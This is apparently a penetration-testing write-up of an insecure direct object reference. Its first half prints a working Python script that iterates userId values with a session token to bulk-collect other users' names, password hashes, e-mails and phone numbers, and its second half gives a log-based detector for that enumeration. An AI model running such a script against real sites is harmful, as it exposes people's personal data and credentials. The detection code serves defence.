While penetration testing a website, I logged in and clicked "Edit information".
Looking at the request data, one of the requests was as follows: the system echoes account-related information back based on the userId value, including sensitive data such as the account name, the password hash, the e-mail address and the phone number.
Changing the userId value to 1 successfully returned another user's account information.
This shows the system has an API traversal problem (an insecure direct object reference: the server never checks that the requested userId belongs to the logged-in session). I wrote a Python script to iterate over userId values and collect personal information in bulk.
The script is as follows:
import requests
from colorama import init, Fore

init(autoreset=True)

header = {
    'Cookie': 'xxx',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Token': '625390f4-1103-4923-84b6-92ef86e7141c',
    'Referer': 'https://xx/userCenter/manCore/manMassage',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Te': 'trailers',
    'Connection': 'close',
}

for i in range(1, 100):
    url = "https://xx/api/personal/detail?userId=%s" % i
    try:
        res = requests.get(url=url, headers=header)
        text = res.json()
        company = text.get("data").get("company")
        ip = text.get("data").get("createIP")
        name = text.get("data").get("userName")
        password = text.get("data").get("password")
        emil = text.get("data").get("emil")
        phone = text.get("data").get("phone")
        print(Fore.GREEN + "company:%s, 注册ip:%s, 账号:%s, 密码:%s, 邮箱:%s, 手机号:%s" % (company, ip, name, password, emil, phone))
    except:
        pass
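From the defending side, the traversal above leaves an obvious trace in the web server's access logs: a single Token header reading many distinct userId values within seconds, where a legitimate client only ever reads its own profile. The detector below is an added example and not part of the original post; the log line format, the token values and the client IPs are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed access-log sample (not real traffic): time, client IP, Token header
# value, method, request path, status. TOKEN_A walks userId 1..5 in sequence.
SAMPLE_LOG = """\
2024-06-01T10:00:00Z 198.51.100.7 token=TOKEN_B GET /api/personal/detail?userId=4821 200
2024-06-01T10:00:01Z 203.0.113.5 token=TOKEN_A GET /api/personal/detail?userId=1 200
2024-06-01T10:00:01Z 203.0.113.5 token=TOKEN_A GET /api/personal/detail?userId=2 200
2024-06-01T10:00:02Z 203.0.113.5 token=TOKEN_A GET /api/personal/detail?userId=3 200
2024-06-01T10:00:02Z 203.0.113.5 token=TOKEN_A GET /api/personal/detail?userId=4 200
2024-06-01T10:00:03Z 203.0.113.5 token=TOKEN_A GET /api/personal/detail?userId=5 200
2024-06-01T10:05:00Z 198.51.100.7 token=TOKEN_B GET /api/personal/detail?userId=4821 200
"""
LINE_RE = re.compile(r"^(\S+) (\S+) token=(\S+) (\S+) (\S+) (\d{3})$")

def parse_line(line):
    """Return (timestamp, token, userId) for a /api/personal/detail hit, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, _ip, token, _method, path, _status = m.groups()
    url = urlparse(path)
    uid = parse_qs(url.query).get("userId", [""])[0]
    if url.path != "/api/personal/detail" or not uid.isdigit():
        return None
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), token, int(uid)

def detect_enumeration(log_text, window=timedelta(seconds=60), min_ids=5):
    """Return {token: sorted userIds} for tokens that read >= min_ids distinct
    userIds inside any `window`; one client normally reads only its own profile."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if parsed := parse_line(line):
            ts, token, uid = parsed
            hits[token].append((ts, uid))
    flagged = {}
    for token, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding time window over this token's hits
            while events[end][0] - events[start][0] > window:
                start += 1
            ids = {uid for _, uid in events[start:end + 1]}
            if len(ids) >= min_ids:
                flagged[token] = sorted(ids)
                break
    return flagged
```

Running `detect_enumeration(SAMPLE_LOG)` flags only TOKEN_A; tune `window` and `min_ids` to the normal profile-read rate of the application before alerting on it.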